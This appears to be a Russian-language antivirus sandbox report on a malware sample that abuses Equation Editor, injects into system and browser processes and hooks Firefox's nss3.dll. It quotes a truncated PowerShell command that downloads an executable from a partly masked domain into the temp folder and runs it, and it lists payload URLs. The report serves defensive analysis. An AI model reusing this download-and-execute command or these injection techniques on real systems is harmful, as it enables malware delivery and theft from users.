Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$eZ=$env:temp+'\TTI.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://br######ia-worldwide.co.uk/frityst/over.exe' -Destination $eZ;(New-Object -com Shell.Ap...
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
- %WINDIR%\syswow64\wuapp.exe
следующие пользовательские процессы:
- tti.exe
- iexplore.exe
- firefox.exe
Перехватывает функции
в браузерах
- Процесс firefox.exe, модуль nss3.dll
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bit55f2.tmp
- %TEMP%\bit6eba.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\bit55f2.tmp
- %TEMP%\bit6eba.tmp
Перемещает следующие файлы
- %TEMP%\bit6eba.tmp в %TEMP%\tti.exe
- %TEMP%\bit55f2.tmp в %TEMP%\tti.exe
Подменяет следующие файлы
- %TEMP%\tti.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://br######ia-worldwide.co.uk/frityst/over.exe
- http://17#.#3.162.253/bin_eFLcWSQ29.bin
UDP
- DNS ASK br######ia-worldwide.co.uk
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$eZ=$env:temp+'\TTI.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://br######ia-worldwide.co.uk/frityst/over.exe' -Destination $eZ;(New-Object -com Shell.Ap...' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\wuapp.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%TEMP%\TTI.exe"
